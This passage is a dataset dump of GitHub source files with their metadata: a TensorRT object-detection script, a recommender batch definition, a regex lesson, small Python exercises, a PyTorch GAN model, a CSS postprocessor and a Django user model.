Dataset schema (one row per column; ranges are the observed minimum and maximum):

| Column | Type | Range / values |
|---|---|---|
| blob_id | string | length 40 |
| directory_id | string | length 40 |
| path | string | length 3 to 288 |
| content_id | string | length 40 |
| detected_licenses | list | length 0 to 112 |
| license_type | string | 2 classes |
| repo_name | string | length 5 to 115 |
| snapshot_id | string | length 40 |
| revision_id | string | length 40 |
| branch_name | string | 684 classes |
| visit_date | timestamp[us] | 2015-08-06 10:31:46 to 2023-09-06 10:44:38 |
| revision_date | timestamp[us] | 1970-01-01 02:38:32 to 2037-05-03 13:00:00 |
| committer_date | timestamp[us] | 1970-01-01 02:38:32 to 2023-09-06 01:08:06 |
| github_id | int64 (nullable) | 4.92k to 681M |
| star_events_count | int64 | 0 to 209k |
| fork_events_count | int64 | 0 to 110k |
| gha_license_id | string | 22 classes |
| gha_event_created_at | timestamp[us] (nullable) | 2012-06-04 01:52:49 to 2023-09-14 21:59:50 |
| gha_created_at | timestamp[us] (nullable) | 2008-05-22 07:58:19 to 2023-08-21 12:35:19 |
| gha_language | string | 147 classes |
| src_encoding | string | 25 classes |
| language | string | 1 class |
| is_vendor | bool | 2 classes |
| is_generated | bool | 2 classes |
| length_bytes | int64 | 128 to 12.7k |
| extension | string | 142 classes |
| content | string | length 128 to 8.19k |
| authors | list | length 1 |
| author_id | string | length 1 to 132 |
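If this dump comes from a Hugging Face dataset viewer (an assumption based on the schema layout above), equivalent rows can be pulled programmatically. A minimal sketch with a placeholder dataset path:

```python
# Minimal sketch, assuming a Hugging Face dataset with the schema above;
# "your-org/your-dataset" is a placeholder, not the real dataset name.
from datasets import load_dataset

ds = load_dataset("your-org/your-dataset", split="train", streaming=True)
for row in ds.take(3):
    print(row["repo_name"], row["path"], row["length_bytes"])
```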
e1881ded3dce36b78149971eeb52f0be86908022
|
b62599ac4093da825708638a4a25f252a83e9f37
|
/object_detection/object_detection_rt.py
|
d2a4c5443ef1178afc36c91e7053405948f18f7b
|
[] |
no_license
|
raspberry-pi-maker/NVIDIA-Jetson
|
25ca2033d36aa8c6f837ed2a8c49281d646be29b
|
30a5596aa0d9a6a960f2fef4d084eb42a94a2b66
|
refs/heads/master
| 2023-06-23T04:17:15.675476 | 2023-06-10T02:23:33 | 2023-06-10T02:23:33 | 211,216,972 | 40 | 30 | null | null | null | null |
UTF-8
|
Python
| false | false | 4,250 |
py
|
import argparse
import numpy as np
import os
import six.moves.urllib as urllib
import sys
import time
import tarfile
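# The next import matters only for its side effect: in TF 1.x it registers the
# TensorRT engine ops (TRTEngineOp) that a TRT-optimized frozen graph needs at load time.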
import tensorflow.contrib.tensorrt as trt
import tensorflow as tf
import zipfile
from distutils.version import StrictVersion
from collections import defaultdict
from io import StringIO
from matplotlib import pyplot as plt
from PIL import Image
from object_detection.utils import ops as utils_ops
if StrictVersion(tf.__version__) < StrictVersion('1.12.0'):
raise ImportError('Please upgrade your TensorFlow installation to v1.12.*.')
from object_detection.utils import label_map_util
from object_detection.utils import visualization_utils as vis_util
tf_sess = None
graph_def = None
parser = argparse.ArgumentParser(description='object_detection using tensorRT')
parser.add_argument('--trtmodel', type=str, required=True, help='target tensorRT optimized model path')
parser.add_argument('--image', type=str, required=True, help='inference image file path')
args = parser.parse_args()
PATH_TO_LABELS = './object_detection/data/mscoco_label_map.pbtxt'
category_index = label_map_util.create_category_index_from_labelmap(PATH_TO_LABELS, use_display_name=True)
def load_image_into_numpy_array(image):
(im_width, im_height) = image.size
return np.array(image.getdata()).reshape(
(im_height, im_width, 3)).astype(np.uint8)
# Size, in inches, of the output images.
IMAGE_SIZE = (12, 8)
def load_graph():
gf = tf.GraphDef()
with tf.gfile.GFile(args.trtmodel, 'rb') as fid:
gf.ParseFromString(fid.read())
return gf
def make_session(graph_def):
global tf_sess
tf_config = tf.ConfigProto()
tf_config.gpu_options.allow_growth = True
#tf_sess = tf.Session(config=tf_config, graph = graph_def)
tf_sess = tf.Session(config=tf_config)
tf.import_graph_def(graph_def, name='')
def run_inference_for_single_image2(image):
global tf_sess
tf_input = tf_sess.graph.get_tensor_by_name('image_tensor' + ':0')
tensor_dict = {}
ops = tf.get_default_graph().get_operations()
all_tensor_names = {output.name for op in ops for output in op.outputs}
#for key in [ 'num_detections', 'detection_boxes', 'detection_scores', 'detection_classes', 'detection_masks' ]:
for key in [ 'num_detections', 'detection_boxes', 'detection_scores', 'detection_classes']:
tensor_name = key + ':0'
if tensor_name in all_tensor_names:
tensor_dict[key] = tf.get_default_graph().get_tensor_by_name(tensor_name)
t = time.time()
output_dict = tf_sess.run(tensor_dict, feed_dict={tf_input: image})
elapsed = time.time() - t
output_dict['num_detections'] = int(output_dict['num_detections'][0])
output_dict['detection_classes'] = output_dict[ 'detection_classes'][0].astype(np.int64)
output_dict['detection_boxes'] = output_dict['detection_boxes'][0]
output_dict['detection_scores'] = output_dict['detection_scores'][0]
return output_dict, elapsed
graph_def = load_graph()
make_session(graph_def)
print('===== Image open:%s ====='%(args.image))
im = Image.open(args.image)
width, height = im.size
#image = im.resize((int(width / 2), int(height / 2)))
image = im.copy()
# the array based representation of the image will be used later in order to prepare the
# result image with boxes and labels on it.
image_np = load_image_into_numpy_array(image)
# Expand dimensions since the model expects images to have shape: [1, None, None, 3]
image_np_expanded = np.expand_dims(image_np, axis=0)
# Actual detection.
#output_dict, elapsed = run_inference_for_single_image(image_np_expanded, graph_def)
output_dict, elapsed = run_inference_for_single_image2(image_np_expanded)
# Visualization of the results of a detection.
vis_util.visualize_boxes_and_labels_on_image_array(
image_np,
output_dict['detection_boxes'],
output_dict['detection_classes'],
output_dict['detection_scores'],
category_index,
instance_masks=output_dict.get('detection_masks'),
use_normalized_coordinates=True,
line_thickness=8)
fig = plt.figure(figsize=IMAGE_SIZE)
txt = 'FPS:%f'%(1.0 / elapsed)
plt.text(10, 10, txt, fontsize=12)
plt.imshow(image_np)
name = os.path.splitext(args.image)[0]
name = name + '_result_rt.png'
plt.savefig(name)
|
[
"[email protected]"
] | |
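One caveat on the FPS figure the script above prints: it times a single `sess.run`, and in TF 1.x the first run also pays one-time graph-initialization and TensorRT engine-build costs. A hedged sketch of the usual remedy, reusing `run_inference_for_single_image2` from the file above:

```python
import time

def timed_fps(image, n_warmup=3, n_runs=20):
    """Average FPS after warm-up, reusing run_inference_for_single_image2 above."""
    for _ in range(n_warmup):          # first runs pay one-time TRT/graph setup
        run_inference_for_single_image2(image)
    t0 = time.time()
    for _ in range(n_runs):
        run_inference_for_single_image2(image)
    return n_runs / (time.time() - t0)

# print('FPS (steady state): %.2f' % timed_fps(image_np_expanded))
```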
0c3f52b0dcd6a2a978142a858d3fed4a8d00e023
|
a0cde41c20d4ffdcc1ace0e217e3338f1cd93cde
|
/src/batchDefinition/slanTour/batchDefSTWeightedAVG.py
|
2ec97b0b75915ffa295f2489348f02040b01fc35
|
[] |
no_license
|
sbalcar/HeterRecomPortfolio
|
ea15a3277774d1b37d69b527406e5a8558cc3cbf
|
a8714902a1f45b5e9bfe0f9af40cce87e36c7471
|
refs/heads/master
| 2022-05-30T00:59:36.693858 | 2022-04-09T16:12:34 | 2022-04-09T16:12:34 | 219,495,240 | 1 | 3 | null | 2021-01-17T12:44:59 | 2019-11-04T12:21:41 |
Jupyter Notebook
|
UTF-8
|
Python
| false | false | 3,061 |
py
|
#!/usr/bin/python3
import os
from typing import List
from typing import Dict #class
from pandas.core.frame import DataFrame #class
from portfolioDescription.portfolio1AggrDescription import Portfolio1AggrDescription #class
from evaluationTool.aEvalTool import AEvalTool #class
from evaluationTool.evalToolDHondt import EvalToolDHondt #class
from aggregationDescription.aggregationDescription import AggregationDescription #class
from batchDefinition.inputAggrDefinition import InputAggrDefinition # class
from batchDefinition.inputRecomSTDefinition import InputRecomSTDefinition #class
from aggregation.operators.aDHondtSelector import ADHondtSelector #class
from aggregation.operators.rouletteWheelSelector import RouletteWheelSelector #class
from aggregation.operators.theMostVotedItemSelector import TheMostVotedItemSelector #class
from batchDefinition.inputABatchDefinition import InputABatchDefinition
from batchDefinition.aBatchDefinitionST import ABatchDefinitionST #class
from batchDefinition.ml1m.batchDefMLWeightedAVG import BatchDefMLWeightedAVG #class
from batchDefinition.inputSimulatorDefinition import InputSimulatorDefinition #class
from simulator.simulator import Simulator #class
from history.historyHierDF import HistoryHierDF #class
from batchDefinition.ml1m.batchDefMLFuzzyDHondt import BatchDefMLFuzzyDHondt #class
from portfolioModel.pModelBandit import PModelBandit #class
from portfolioModel.pModelDHondtBanditsVotes import PModelDHondtBanditsVotes #class
from portfolioModel.pModelDHondt import PModelDHondt #class
class BatchDefSTWeightedAVG(ABatchDefinitionST):
def getBatchName(self):
return "WAVG"
def getParameters(self):
batchDefMLWeightedAVG = BatchDefMLWeightedAVG()
batchDefMLWeightedAVG.lrClicks: List[float] = [0.03]
batchDefMLWeightedAVG.lrViewDivisors: List[float] = [250]
return batchDefMLWeightedAVG.getParameters()
def run(self, batchID:str, jobID:str):
divisionDatasetPercentualSize:int
uBehaviour:str
repetition:int
divisionDatasetPercentualSize, uBehaviour, repetition = InputABatchDefinition().getBatchParameters(self.datasetID)[batchID]
eTool:AEvalTool = self.getParameters()[jobID]
rIDs, rDescs = InputRecomSTDefinition.exportPairOfRecomIdsAndRecomDescrs()
aDescWeightedAVG:AggregationDescription = InputAggrDefinition.exportADescWeightedAVG()
pDescr:Portfolio1AggrDescription = Portfolio1AggrDescription(
self.getBatchName() + jobID, rIDs, rDescs, aDescWeightedAVG)
model:DataFrame = PModelDHondt(pDescr.getRecommendersIDs())
simulator:Simulator = InputSimulatorDefinition().exportSimulatorSlantour(
batchID, divisionDatasetPercentualSize, uBehaviour, repetition)
simulator.simulate([pDescr], [model], [eTool], [HistoryHierDF(pDescr.getPortfolioID())])
if __name__ == "__main__":
os.chdir("..")
os.chdir("..")
print(os.getcwd())
BatchDefSTWeightedAVG.generateAllBatches(InputABatchDefinition())
|
[
"[email protected]"
] | |
e89063f004ef56318689c8df2ebf442192e2aa44
|
a39e95a0536d312311531a49dec90bcc8f7ab0c5
|
/Lesson6_FunctionCompileRE/main.py
|
46adef70714ec420ee43ff944b6b4cdcde1257cb
|
[] |
no_license
|
Hadirback/python_part2
|
095010ca4866a4b6c9e5ca092602b43edbd344e8
|
a4b00aeb30f88df55751d5f23e570c33face113d
|
refs/heads/master
| 2020-08-11T09:13:03.793607 | 2019-11-04T23:10:45 | 2019-11-04T23:10:45 | 214,536,159 | 0 | 0 | null | null | null | null |
UTF-8
|
Python
| false | false | 1,406 |
py
|
# compile
# re.compile is useful when the same pattern has to be searched (and
# substituted) across several different variables
import re
text1 = """
Сбо́рная Франции по футбо́лу 34-я минута представляет Францию в международных
матчах и турнирах по футболу. """
text2 = """
Управляющая организация 56-й номер — Федерация футбола Франции.
"""
text3 = """
Федерация является членом ФИФА с 1904 года, членом УЕФА с 1954
года. Французы 1-й час были одними из основателей обеих этих организаций.
"""
# extract the ordinal number tokens ("34-я", "56-й", "1-й") from all texts
pattern_string = r"\d{1,2}-[йя]"
print(re.findall(pattern_string, text1))
print(re.findall(pattern_string, text2))
print(re.findall(pattern_string, text3))
# without compiling, pattern_string is re-parsed into a pattern object on
# every call, which is a comparatively expensive operation
pattern = re.compile(r"\d{1,2}-[йя]")
print(type(pattern))
print(pattern.findall(text2))
print(pattern.findall(text1))
print(pattern.findall(text3))
print(re.sub(pattern, "n", text3))
# the precompiled pattern runs faster
|
[
"[email protected]"
] | |
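The comments in the previous file claim that a precompiled pattern is faster than passing the pattern string to `re.findall` each time. A quick way to check the claim (a sketch; the gap is modest in practice because the `re` module also caches recently compiled patterns internally):

```python
import re
import timeit

text = "Сборная Франции 34-я минута, 56-й номер, 1-й час " * 100
pattern = re.compile(r"\d{1,2}-[йя]")

print(timeit.timeit(lambda: re.findall(r"\d{1,2}-[йя]", text), number=10_000))
print(timeit.timeit(lambda: pattern.findall(text), number=10_000))
```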
d0937d391db976cdd9ce380dfda1333e8c5e6cfd
|
6ffc398b4a27c339f24938e8a0b9c565e33539ce
|
/site-packages-27/fpdf/__init__.py
|
e1f6d0ec86f11b94c27e9cf80fc511a1e065dabb
|
[] |
no_license
|
zwlyn/awesome-pdf
|
8f4483d717130a54545f2ba8b05313da99103039
|
8223929db5433c7b4ed61bceb4f5808c12e1ad85
|
refs/heads/master
| 2023-01-24T23:52:35.415117 | 2020-04-05T12:05:31 | 2020-04-05T12:05:31 | 253,162,782 | 2 | 0 | null | 2023-01-05T10:50:08 | 2020-04-05T05:31:20 |
Python
|
UTF-8
|
Python
| false | false | 415 |
py
|
#!/usr/bin/env python
# -*- coding: utf-8 -*-
"FPDF for python"
__license__ = "LGPL 3.0"
__version__ = "1.7.9"
from .fpdf import FPDF, FPDF_FONT_DIR, FPDF_VERSION, SYSTEM_TTFONTS, set_global, FPDF_CACHE_MODE, FPDF_CACHE_DIR
try:
from .html import HTMLMixin
except ImportError:
import warnings
warnings.warn("web2py gluon package not installed, required for html2pdf")
from .template import Template
|
[
"[email protected]"
] | |
90fc9a11b36c7ec3937a286038d3b1c0a4812f9d
|
3529ecaa44a53172094ba13498097057c8972723
|
/Questiondir/520.detect-capital/520.detect-capital_93512141.py
|
4b4f3fe2c57d6a464255034820308ab06b71b8df
|
[] |
no_license
|
cczhong11/Leetcode-contest-code-downloader
|
0681f0f8c9e8edd5371fd8d0a1d37dcc368566b6
|
db64a67869aae4f0e55e78b65a7e04f5bc2e671c
|
refs/heads/master
| 2021-09-07T15:36:38.892742 | 2018-02-25T04:15:17 | 2018-02-25T04:15:17 | 118,612,867 | 0 | 0 | null | null | null | null |
UTF-8
|
Python
| false | false | 376 |
py
|
class Solution(object):
def detectCapitalUse(self, word):
"""
:type word: str
:rtype: bool
"""
if word == word.upper():
return True
if word == word.lower():
return True
if (word[:1] == word[:1].upper()) and (word[1:] == word[1:].lower()):
return True
return False
|
[
"[email protected]"
] | |
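The three branches above map directly onto built-in string predicates; for purely alphabetic input (which this problem guarantees) the following one-liner is equivalent:

```python
class SolutionAlt(object):
    def detectCapitalUse(self, word):
        # All caps, all lowercase, or capitalized like a title.
        return word.isupper() or word.islower() or word.istitle()
```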
8fe3e72a4fe1168fd5eb38c66f4f4aa526bd5ad0
|
e23a4f57ce5474d468258e5e63b9e23fb6011188
|
/125_algorithms/_exercises/templates/100_Python_Exercises_Evaluate_and_Improve_Your_Skills/Exercise 12 - More Ranges NUKE.py
|
7bb9127b558afdf2d3b6aa97628abdcdb2897719
|
[] |
no_license
|
syurskyi/Python_Topics
|
52851ecce000cb751a3b986408efe32f0b4c0835
|
be331826b490b73f0a176e6abed86ef68ff2dd2b
|
refs/heads/master
| 2023-06-08T19:29:16.214395 | 2023-05-29T17:09:11 | 2023-05-29T17:09:11 | 220,583,118 | 3 | 2 | null | 2023-02-16T03:08:10 | 2019-11-09T02:58:47 |
Python
|
UTF-8
|
Python
| false | false | 163 |
py
|
#Create a script that generates a list whose items are products of the original list items multiplied by 10
my_range = range(1, 21)
print([10 * x for x in my_range])
|
[
"[email protected]"
] | |
788ed2e5916d24970d79524c60e182a03ad4ecfb
|
a884039e1a8b0ab516b80c2186e0e3bad28d5147
|
/Livros/Introdução à Programação - 500 Algoritmos resolvidos/Capitulo 2/Exercicios 2a/Algoritmo36_lea9.py
|
a368507b3389f066630181aa6ff943bc3796ea6c
|
[
"MIT"
] |
permissive
|
ramonvaleriano/python-
|
6e744e8bcd58d07f05cd31d42a5092e58091e9f0
|
ada70918e945e8f2d3b59555e9ccc35cf0178dbd
|
refs/heads/main
| 2023-04-10T14:04:24.497256 | 2021-04-22T18:49:11 | 2021-04-22T18:49:11 | 340,360,400 | 0 | 0 | null | null | null | null |
UTF-8
|
Python
| false | false | 273 |
py
|
# Program: Algoritmo36_lea9.py
# Author: Ramon R. Valeriano
# Description:
# Developed: 14/03/2020 - 19:55
# Updated:
number1 = int(input("Enter the first number: "))
number2 = int(input("Enter the second number: "))
sum_ = number1 + number2
print("The sum: %d" %sum_)
|
[
"[email protected]"
] | |
05be3c6193f89bc5f3be46293ad8f4dda8d7aff8
|
163bbb4e0920dedd5941e3edfb2d8706ba75627d
|
/Code/CodeRecords/2551/60771/296110.py
|
9c1d23a5339719691c0cae541b95c62c95ea2fb3
|
[] |
no_license
|
AdamZhouSE/pythonHomework
|
a25c120b03a158d60aaa9fdc5fb203b1bb377a19
|
ffc5606817a666aa6241cfab27364326f5c066ff
|
refs/heads/master
| 2022-11-24T08:05:22.122011 | 2020-07-28T16:21:24 | 2020-07-28T16:21:24 | 259,576,640 | 2 | 1 | null | null | null | null |
UTF-8
|
Python
| false | false | 408 |
py
|
#15
ori = input().split(" ")
N = int(ori[0])
M = int(ori[1])
lights = [False]*N
for i in range(0,M):
ori = input().split(" ")
a = int(ori[1])
b = int(ori[2])
if ori[0] == "0":
for j in range(a-1,b):
lights[j] = not lights[j]
if ori[0] == "1":
res = 0
for j in range(a-1,b):
if lights[j] == True:
res += 1
print(res)
|
[
"[email protected]"
] | |
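Restated as a self-contained function with a tiny worked check (op 0 toggles lights a..b, op 1 reports how many lights in a..b are on, mirroring the branches above):

```python
def run_ops(n, ops):
    """Apply (op, a, b) triples; return the counts produced by op == 1."""
    lights = [False] * n
    counts = []
    for op, a, b in ops:
        if op == 0:
            for j in range(a - 1, b):
                lights[j] = not lights[j]
        else:
            counts.append(sum(lights[a - 1:b]))
    return counts

# Toggle lights 1-2, then count lit lights in 1-3: exactly two are on.
assert run_ops(3, [(0, 1, 2), (1, 1, 3)]) == [2]
```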
1f5efb06eab8edbd3e09147a821a534f8f2d7483
|
1154fa5ae6fe517151e41f5f4746d1bada23e1a5
|
/scenes/cup_generator/model.py
|
7e8f6d5861759736d796c1fb6a1e135ab6258a3d
|
[] |
no_license
|
joaomonteirof/SMART_COUSP_Reconstruction
|
9f7aac2eb08bc67f3d8b7e786ff66a5c1c9dadf4
|
79ea702d75875bec399721b04cdaecf4fc6a6a0e
|
refs/heads/master
| 2023-09-04T00:05:20.981615 | 2021-10-13T17:26:10 | 2021-10-13T17:26:10 | 106,738,046 | 1 | 0 | null | null | null | null |
UTF-8
|
Python
| false | false | 3,485 |
py
|
import torch
import torch.nn as nn
import torch.nn.functional as F
class Generator(torch.nn.Module):
def __init__(self, input_dim=128, num_filters=[1024, 512, 256, 128, 64, 32], output_dim=1):
super(Generator, self).__init__()
# Hidden layers
self.hidden_layer = torch.nn.Sequential()
for i in range(len(num_filters)):
# Deconvolutional layer
if i == 0:
deconv = nn.ConvTranspose2d(input_dim, num_filters[i], kernel_size=4, stride=1, padding=0)
else:
deconv = nn.ConvTranspose2d(num_filters[i - 1], num_filters[i], kernel_size=4, stride=2, padding=1)
deconv_name = 'deconv' + str(i + 1)
self.hidden_layer.add_module(deconv_name, deconv)
# Initializer
nn.init.normal_(deconv.weight, mean=0.0, std=0.02)
nn.init.constant_(deconv.bias, 0.0)
# Batch normalization
bn_name = 'bn' + str(i + 1)
self.hidden_layer.add_module(bn_name, torch.nn.BatchNorm2d(num_filters[i]))
# Activation
act_name = 'act' + str(i + 1)
self.hidden_layer.add_module(act_name, torch.nn.ReLU())
# Output layer
self.output_layer = torch.nn.Sequential()
# Deconvolutional layer
out = torch.nn.ConvTranspose2d(num_filters[i], output_dim, kernel_size=4, stride=2, padding=1)
self.output_layer.add_module('out', out)
# Initializer
nn.init.normal_(out.weight, mean=0.0, std=0.02)
nn.init.constant_(out.bias, 0.0)
# Activation
self.output_layer.add_module('act', torch.nn.Sigmoid())
def forward(self, x):
if x.dim()==2:
x = x.unsqueeze(-1).unsqueeze(-1)
elif not x.dim()==4:
print('WRONG INPUT DIMENSION!!')
exit(1)
h = self.hidden_layer(x)
out = self.output_layer(h)
return out
class Discriminator(torch.nn.Module):
def __init__(self, optimizer, lr, betas, input_dim=1, num_filters=[32, 64, 128, 256, 512, 1024], output_dim=1, batch_norm=False):
super(Discriminator, self).__init__()
self.projection = nn.Conv2d(input_dim, 1, kernel_size=8, stride=2, padding=3, bias=False)
with torch.no_grad():
self.projection.weight /= torch.norm(self.projection.weight.squeeze()).item()
# Hidden layers
self.hidden_layer = torch.nn.Sequential()
for i in range(len(num_filters)):
# Convolutional layer
if i == 0:
conv = nn.Conv2d(1, num_filters[i], kernel_size=4, stride=2, padding=1)
else:
conv = nn.Conv2d(num_filters[i - 1], num_filters[i], kernel_size=4, stride=2, padding=1)
conv_name = 'conv' + str(i + 1)
self.hidden_layer.add_module(conv_name, conv)
# Initializer
nn.init.normal_(conv.weight, mean=0.0, std=0.02)
nn.init.constant_(conv.bias, 0.0)
# Batch normalization
if i != 0 and batch_norm:
bn_name = 'bn' + str(i + 1)
self.hidden_layer.add_module(bn_name, torch.nn.BatchNorm2d(num_filters[i]))
# Activation
act_name = 'act' + str(i + 1)
self.hidden_layer.add_module(act_name, torch.nn.LeakyReLU(0.2))
# Output layer
self.output_layer = torch.nn.Sequential()
# Convolutional layer
out = nn.Conv2d(num_filters[i], output_dim, kernel_size=4, stride=1, padding=1)
self.output_layer.add_module('out', out)
# Initializer
nn.init.normal_(out.weight, mean=0.0, std=0.02)
nn.init.constant_(out.bias, 0.0)
# Activation
self.output_layer.add_module('act', nn.Sigmoid())
self.optimizer = optimizer(list(self.hidden_layer.parameters()) + list(self.output_layer.parameters()), lr=lr, betas=betas)
def forward(self, x):
x = self.projection(x)
h = self.hidden_layer(x)
out = self.output_layer(h)
return out.squeeze()
|
[
"[email protected]"
] | |
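A quick shape sanity check for the `Generator` above, following its constructor defaults: the first deconvolution maps the 1x1 latent to 4x4, and each of the six remaining stride-2 stages doubles the side, giving 256x256:

```python
import torch

g = Generator()                       # defaults from the class above
z = torch.randn(4, 128)               # forward() unsqueezes 2-D input to NCHW
out = g(z)
assert out.shape == (4, 1, 256, 256)  # 1x1 -> 4x4, then six doublings
```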
c12730826a6aa9d5f5d486adc9b4fbd73d3e312c
|
87b4518e55c0e465aba39d86e65ba56f56502198
|
/css/postprocess.py
|
787db97ecfb72ae1d5d3a86a4fc9aaf218d47c28
|
[
"MIT"
] |
permissive
|
Serkan-devel/m.css
|
302831008d8949a2fb7b91565621b47dd638e38f
|
3c0e3d7875bc9ab63c93322cc02cab62239804d7
|
refs/heads/master
| 2020-04-01T02:00:17.005772 | 2019-01-12T11:36:33 | 2019-01-12T11:36:33 | 152,761,732 | 0 | 0 |
MIT
| 2019-01-12T11:36:34 | 2018-10-12T14:20:51 |
Python
|
UTF-8
|
Python
| false | false | 7,550 |
py
|
#!/usr/bin/env python
#
# This file is part of m.css.
#
# Copyright © 2017, 2018, 2019 Vladimír Vondruš <[email protected]>
#
# Permission is hereby granted, free of charge, to any person obtaining a
# copy of this software and associated documentation files (the "Software"),
# to deal in the Software without restriction, including without limitation
# the rights to use, copy, modify, merge, publish, distribute, sublicense,
# and/or sell copies of the Software, and to permit persons to whom the
# Software is furnished to do so, subject to the following conditions:
#
# The above copyright notice and this permission notice shall be included
# in all copies or substantial portions of the Software.
#
# THE SOFTWARE IS PROVIDED "AS IS", WITHOUT WARRANTY OF ANY KIND, EXPRESS OR
# IMPLIED, INCLUDING BUT NOT LIMITED TO THE WARRANTIES OF MERCHANTABILITY,
# FITNESS FOR A PARTICULAR PURPOSE AND NONINFRINGEMENT. IN NO EVENT SHALL
# THE AUTHORS OR COPYRIGHT HOLDERS BE LIABLE FOR ANY CLAIM, DAMAGES OR OTHER
# LIABILITY, WHETHER IN AN ACTION OF CONTRACT, TORT OR OTHERWISE, ARISING
# FROM, OUT OF OR IN CONNECTION WITH THE SOFTWARE OR THE USE OR OTHER
# DEALINGS IN THE SOFTWARE.
#
import argparse
import re
import os
import sys
import_rx = re.compile("^@import url\\('(?P<file>[^']+)'\\);$")
opening_brace_rx = re.compile("^\\s*:root\\s*{\\s*$")
closing_brace_rx = re.compile("^\\s*}\\s*$")
comment_rx = re.compile("^\\s*(/\\*.*\\*/)?\\s*$")
comment_start_rx = re.compile("^\\s*(/\\*.*)\\s*$")
comment_end_rx = re.compile("^\\s*(.*\\*/)\\s*$")
variable_declaration_rx = re.compile("^\\s*(?P<key>--[a-z-]+)\\s*:\\s*(?P<value>[^;]+)\\s*;\\s*(/\\*.*\\*/)?\\s*$")
variable_use_rx = re.compile("^(?P<before>.+)var\\((?P<key>--[a-z-]+)\\)(?P<after>.+)$")
def postprocess(files, process_imports, out_file):
directory = os.path.dirname(files[0])
if not out_file:
basename, ext = os.path.splitext(files[0])
out_file = basename + ".compiled" + ext
variables = {}
imported_files = []
def parse(f):
nonlocal variables, imported_files
not_just_variable_declarations = False
in_variable_declarations = False
in_comment = False
for line in f:
# In comment and the comment is not ending yet, ignore
if in_comment:
if comment_end_rx.match(line):
in_comment = False
continue
# Import statement: add the file to additionally processed files
# unless it's disabled
match = import_rx.match(line)
if match:
if process_imports:
imported_files += [match.group('file')]
continue
# Variable use, replace with actual value
# TODO: more variables on the same line?
match = variable_use_rx.match(line)
if match and match.group('key') in variables:
out.write(match.group('before'))
out.write(variables[match.group('key')])
# Strip the trailing comment, if there, to save some bytes
if match.group('after').endswith('*/'):
out.write(match.group('after')[:match.group('after').rindex('/*')].rstrip())
else:
out.write(match.group('after'))
out.write("\n")
continue
# Opening brace of variable declaration block
match = opening_brace_rx.match(line)
if match:
in_variable_declarations = True
continue
# Variable declaration
match = variable_declaration_rx.match(line)
if match and in_variable_declarations:
variables[match.group('key')] = match.group('value')
continue
# Comment or empty line, ignore
if comment_rx.match(line):
continue
# Comment start line, ignore this and the next lines
if comment_start_rx.match(line):
in_comment = True
continue
# Closing brace of variable declaration block. If it was not just
# variable declarations, put the closing brace to the output as
# well.
match = closing_brace_rx.match(line)
if match and in_variable_declarations:
if not_just_variable_declarations: out.write("}\n")
in_variable_declarations = False
continue
            # If inside a variable declaration block, also write the opening
            # brace and remember to put the closing brace there as well
if in_variable_declarations:
out.write(":root {\n")
not_just_variable_declarations = True
# Something else, copy verbatim to the output. Strip the trailing
# comment, if there, to save some bytes.
if line.rstrip().endswith('*/'):
out.write(line[:line.rindex('/*')].rstrip() + '\n')
else:
out.write(line)
with open(out_file, mode='w') as out:
# Put a helper comment and a license blob on top
out.write("""/* Generated using `./postprocess.py {}`. Do not edit. */
/*
This file is part of m.css.
Copyright © 2017, 2018, 2019 Vladimír Vondruš <[email protected]>
Permission is hereby granted, free of charge, to any person obtaining a
copy of this software and associated documentation files (the "Software"),
to deal in the Software without restriction, including without limitation
the rights to use, copy, modify, merge, publish, distribute, sublicense,
and/or sell copies of the Software, and to permit persons to whom the
Software is furnished to do so, subject to the following conditions:
The above copyright notice and this permission notice shall be included
in all copies or substantial portions of the Software.
THE SOFTWARE IS PROVIDED "AS IS", WITHOUT WARRANTY OF ANY KIND, EXPRESS OR
IMPLIED, INCLUDING BUT NOT LIMITED TO THE WARRANTIES OF MERCHANTABILITY,
FITNESS FOR A PARTICULAR PURPOSE AND NONINFRINGEMENT. IN NO EVENT SHALL
THE AUTHORS OR COPYRIGHT HOLDERS BE LIABLE FOR ANY CLAIM, DAMAGES OR OTHER
LIABILITY, WHETHER IN AN ACTION OF CONTRACT, TORT OR OTHERWISE, ARISING
FROM, OUT OF OR IN CONNECTION WITH THE SOFTWARE OR THE USE OR OTHER
DEALINGS IN THE SOFTWARE.
*/
""".format(' '.join(sys.argv[1:])))
# Parse the top-level file
with open(files[0]) as f: parse(f)
# Now open the imported files and parse them as well. Not doing any
# recursive parsing.
for i, file in enumerate(imported_files + files[1:]):
if i: out.write('\n')
with open(file) as f: parse(f)
return 0
if __name__ == "__main__":
parser = argparse.ArgumentParser(description=r"""
Postprocessor for removing @import statements and variables from CSS files.
Combines all files into a new *.compiled.css file. The basename is taken
implicitly from the first argument. The -o option can override the output
filename.""")
parser.add_argument('files', nargs='+', help="input CSS file(s)")
parser.add_argument('--no-import', help="ignore @import statements", action='store_true')
parser.add_argument('-o', '--output', help="output file", default='')
args = parser.parse_args()
exit(postprocess(args.files, not args.no_import, args.output))
|
[
"[email protected]"
] | |
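Per its own docstring, the script combines its inputs into `<first-input>.compiled.css`. The same entry point can be driven from Python (a sketch; the file names are placeholders and the module is assumed importable as `postprocess`):

```python
# Hypothetical invocation of the postprocess() function defined above:
from postprocess import postprocess

# Inline @import-ed files and CSS variables from the two inputs into
# m-dark.compiled.css (the default output name derived from the first input).
postprocess(['m-dark.css', 'm-documentation.css'], process_imports=True, out_file='')
```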
7c0bf7ade1f8db725a4ef41dc22305288b4582ce
|
2716d8e04c957aebc5137b3dbb719cbb31eaf013
|
/user_extent/users/models.py
|
74d53617f24544e6ce4de123d9e95b400466ebb0
|
[] |
no_license
|
anlaganlag/mini_proj_component
|
01d5fdd641cbc2a5199865d64b21431603704bd1
|
1def0fc576bb422b6819bd2df56b8e7cd48d3368
|
refs/heads/master
| 2021-01-06T23:54:13.921612 | 2020-02-20T10:28:55 | 2020-02-20T10:28:55 | 241,518,920 | 0 | 0 | null | null | null | null |
UTF-8
|
Python
| false | false | 206 |
py
|
from django.db import models
from django.contrib.auth.models import AbstractUser
# Create your models here.
class CustomUser(AbstractUser):
pass
def __str__(self):
return self.username
|
[
"[email protected]"
] | |
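A custom user model like the one above only takes effect when the project settings reference it; the standard wiring, assuming the app is installed under the label `users`:

```python
# settings.py -- assumed app label "users"; required for Django to use the
# custom model instead of django.contrib.auth's default User.
AUTH_USER_MODEL = 'users.CustomUser'
```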
24364854b0efa09b1fd0ed72288c66064dfb1353
|
a2e3f4944076a9d25fd6e7aa30d0cda55c47ff18
|
/template_dynamicloader/views.py
|
2f66be35ba8cae440020eeac4d89c162fbdf329c
|
[] |
no_license
|
redatest/Shakal-NG
|
fb62b58b3d4c7a6a236beed8efd98712425621f2
|
d2a38df9910ec11b237912eefe1c1259203675ee
|
refs/heads/master
